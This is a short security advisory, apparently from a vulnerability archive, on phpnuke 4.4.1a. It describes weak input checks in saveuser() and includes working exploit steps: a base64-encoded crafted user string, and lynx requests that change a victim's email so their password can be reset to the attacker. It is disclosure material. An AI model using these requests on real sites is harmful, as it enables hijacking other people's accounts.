Vulnerability

    phpnuke

Affected

    phpnuke 4.4.1a

Description

    Following is based on a  r0tten dev1ce Crew Advisory.   The checks
    that are  realized in  the function  saveuser() are  not enough to
    block abitrary  information being  passed to  the query  of MySQL.
    There are  also many  other functions  that can  be exploited  the
    same way described in the advisory.  This adivisory describes only
    the function saveuser().

    It's possible  for the  attacker to  change the  e-mail address of
    one of the users and ask for the password to be sent to the e-mail
    address that  the attacker  have provided.   Of course  this isn't
    easy since we do not know the  UID of each of the users, but  this
    this  type  of  information  is  easily  obtained  with bruteforce
    checks.

    Exploit:

        powerhouse:~$ /bin/echo -e "0:<user>:2:3:4:5:6:7:8:eee" | uuencode -m f
        begin-base64 644 f
        MDpBbm9ueW1vdXM6MjozOjQ6NTo2Ojc6ODplZWUK     [***]

        lynx http://victim/user.php?op=saveuser&user=[***]&uid=X&uname=<user>

    The variables you can change the value are:

        name='',email='', femail='', url='', bio='' , user_avatar='',
        user_icq='', user_occ='', user_from='', user_intrest='', user_sig='',
        user_aim='', user_yim='', user_msnm=''

    In other words, if we want to change the e-mail address, we do:

        lynx
        http://victim/user.php&op=saveuser&user=[***]&uid=X&uname=<user>&email=<email you want>

    If you ask  for the password  to be sent  to e-mail, you  would be
    able to access the account.  Very simple script to demostrate  the
    vulnerability:

        http://www.rdcrew.com.ar

Solution

    Wait for a patch from the author.